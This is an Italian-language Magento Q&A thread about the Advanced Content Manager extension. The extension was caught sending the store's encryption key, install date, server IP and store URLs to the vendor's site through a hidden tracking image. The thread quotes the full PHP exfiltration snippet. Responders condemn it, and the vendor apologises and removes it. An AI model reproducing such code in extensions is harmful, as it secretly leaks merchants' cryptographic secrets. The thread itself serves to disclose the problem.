Qualche buona ragione per cui un modulo accede in remoto a global / crypt / key?


19

Perdona la mia ignoranza, ma la chiave di crittografia viene utilizzata per decrittografare i dati di Magento, giusto? C'è un buon motivo per accedere a un modulo? Mi sono imbattuto in questo codice dopo aver installato Advanced Content Manager ...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />


3
QUESTO. È. ORRIBILE. Non c'è motivo di perdere la chiave di crittografia.
Fabian Blechschmidt,

1
Questo è male, molto male.
Anna Völkl

1
Bella presa! Questo è estremamente negativo ...
Sander Mangel

1
Grazie @Sander per avercelo detto. È stato rimosso da Connect.
segna il

1
@benmarks è felice di saperlo. Ciò è estremamente deludente per le ovvie ragioni e perché l'app è stata estremamente impressionante e lo sviluppatore è stato estremamente utile e rapido in passato.
TylersSN,

Risposte:


11

Sì ... c'è una buona ragione.
Vogliono conoscerlo e registrarlo, per ogni evenienza. :)

Dovresti disinstallare l'estensione (molto probabilmente l'hai già fatto). Non utilizzare mai estensioni che "telefonano a casa", indipendentemente dai dati che inviano a casa.

Potresti voler elencare l'estensione qui affinché gli altri possano vedere: Codice divertente / inutile / orribile dalle estensioni di Magento


1
"telefonare a casa" purtroppo è fatto da molti moduli. Lo fanno anche Amasty e Aheadworks: \
Sander Mangel

4
Questo gist.github.com/miguelbalparda/b57a47a010a5995bc44d può essere utilizzato per controllare global / crypt / key dalla CLI in tutte le cartelle eccellere app / code / core.
mbalparda,

Quindi non solo sono in grado di decrittografare le password dei dati cc (buona cosa non lo salvo), ecc. Ma ho pagato $ 300 per loro di avere quella capacità. Questo è ciò che dovrebbe essere pubblicato su Funny.
TylersSN,

1
@iUseMagentoNow. Questo è divertente "ooh", non divertente "ah ah". Dovresti chiedere il rimborso.
Marius

8

Oggi abbiamo ricevuto la richiesta di supporto per questa funzione. Lo abbiamo già risolto e rimosso questo pezzo di codice. Una nuova versione è disponibile per tutti i nostri clienti nella loro area clienti (gratuitamente, poiché offriamo un aggiornamento illimitato).

So che dobbiamo giustificarlo, quindi facciamolo:

  • L'obiettivo di questo tracker era SOLO seguire l'uso non autorizzato della nostra estensione.
  • Il tracker è stato visualizzato solo nell'area di amministrazione (nessuno dei tuoi clienti o nessun altro che tu e noi sia stato in grado di vederlo).
  • Abbiamo rimosso anche questo nel nostro DB.
  • La chiave è solo per crittografare la password dell'amministratore. Dato che lavoriamo con tutti voi tramite richieste di supporto, potreste avervi già inviato le vostre credenziali via e-mail, per supporto. Se volessimo la tua password, l'avremmo inviata direttamente ... Non era l'obiettivo.
  • Anche con la chiave, la tua password è ancora crittografata. E l'amministratore magento blocca l'utente dopo alcuni tentativi.

Riconosciamo che si tratta di un errore, e questa è la forza della comunità e del sistema open source: possiamo riparare e migliorare molto più velocemente. Grazie a tutti per averci avvisato, faremo ora maggiori sforzi sulla vulnerabilità.


3
+1 per l'impegno a rispondere qui in pubblico su Magento SE!
ottobre

2
Uso non autorizzato dell'estensione ?! Puoi semplicemente usare il dominio per quello.
mbalparda,
Utilizzando il nostro sito, riconosci di aver letto e compreso le nostre Informativa sui cookie e Informativa sulla privacy.
Licensed under cc by-sa 3.0 with attribution required.